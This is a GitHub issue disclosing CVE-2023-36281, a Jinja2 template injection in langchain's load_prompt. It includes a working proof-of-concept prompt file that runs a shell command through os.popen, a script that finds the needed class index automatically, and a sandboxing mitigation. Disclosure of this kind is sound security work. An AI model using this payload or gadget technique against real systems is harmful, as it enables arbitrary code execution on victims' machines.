
CVE-2023-36281: Template injection to arbitrary code execution · Issue #4394 · langchain-ai/langchain

An issue in langchain v0.0.171 allows a remote attacker to execute arbitrary code via a crafted JSON file passed to the load_prompt parameter.


System Info

Windows 11

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. Save the following data to pt.json:

{ "input_variables": [ “prompt” ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ '’.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__[‘popen’](‘dir’).read() }}", "template_format": "jinja2", "validate_template": true, "_type": “prompt” }

  2. Run:

from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")

  3. The dir command is executed (see the sketch after these steps for why).
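
Why step 2 executes code: the sketch below approximates (it is not langchain's exact source) the rendering path that load_prompt and format reach when template_format is "jinja2". The attacker-controlled template string from pt.json ends up rendered by a default, non-sandboxed Jinja2 environment, so expressions in it can walk Python internals; the helper name here is illustrative.

from jinja2 import Template

def render_jinja2_prompt(template: str, **kwargs) -> str:
    # Illustrative stand-in for langchain v0.0.171's jinja2 formatting:
    # the attacker-controlled template is rendered with a default
    # (non-sandboxed) environment, so {{ ... }} expressions can reach
    # os.popen through the class hierarchy.
    return Template(template).render(**kwargs)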

Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to assemble prompts, so template injection happens when the template is attacker-controlled.
Note: in pt.json the template carries the payload; the __subclasses__() index (147 here) may differ in other environments.
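
Because that index is environment-specific, a working exploit enumerates for the gadget instead of hard-coding 147. A minimal sketch (assuming CPython with Jinja2 installed; a benign echo command stands in for dir) that locates os._wrap_close, whose __init__.__globals__ exposes popen:

from jinja2 import Template

# Find the environment-specific index that pt.json hard-codes as 147.
# os._wrap_close is a handy gadget: its __init__ is defined in the os
# module, so its __globals__ dictionary contains popen.
idx = next(
    i for i, cls in enumerate(object.__subclasses__())
    if cls.__name__ == "_wrap_close"
)

payload = (
    "{{ ''.__class__.__bases__[0].__subclasses__()[%d]"
    ".__init__.__globals__['popen']('echo injected').read() }}" % idx
)
print(Template(payload).render())  # prints "injected", proving code ran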

Expected behavior

Loading and formatting a prompt file should not execute arbitrary code.
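
One way to get that behavior (a sketch of a general mitigation, not necessarily the fix langchain shipped) is to render untrusted templates with Jinja2's SandboxedEnvironment, which refuses access to underscore attributes such as __class__ instead of executing the gadget chain:

from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment()
malicious = "{{ ''.__class__.__bases__[0].__subclasses__() }}"

try:
    env.from_string(malicious).render()
except SecurityError as exc:
    # The sandbox raises instead of resolving the unsafe attribute.
    print("blocked:", exc)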

Related news

GHSA-7gfq-f96f-g85j: langchain vulnerable to arbitrary code execution

